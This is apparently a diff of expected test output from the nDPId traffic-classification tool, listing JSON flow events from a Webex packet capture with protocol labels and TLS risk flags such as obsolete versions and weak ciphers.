-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570632436,"flow_last_seen":1444570633205,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":4426,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570638225,"flow_last_seen":1444570642072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":5437,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636359,"flow_last_seen":1444570639256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640330,"flow_last_seen":1444570670371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640338,"flow_last_seen":1444570670373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00925{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":105,"flow_first_seen":1444570669736,"flow_last_seen":1444570738301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":13596,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":513,"flow_first_seen":1444570669745,"flow_last_seen":1444570732084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29642,"flow_tot_l4_payload_len":316364,"flow_avg_l4_payload_len":616,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570674487,"flow_last_seen":1444570675890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1444570679512,"flow_last_seen":1444570680667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":5379,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570693238,"flow_last_seen":1444570694561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570732086,"flow_last_seen":1444570734115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00922{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570712008,"flow_last_seen":1444570716597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":5347,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570640382,"flow_last_seen":1444570699865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00927{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1444570738415,"flow_last_seen":1444570742172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14319,"flow_tot_l4_payload_len":34572,"flow_avg_l4_payload_len":1440,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570640385,"flow_last_seen":1444570699915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 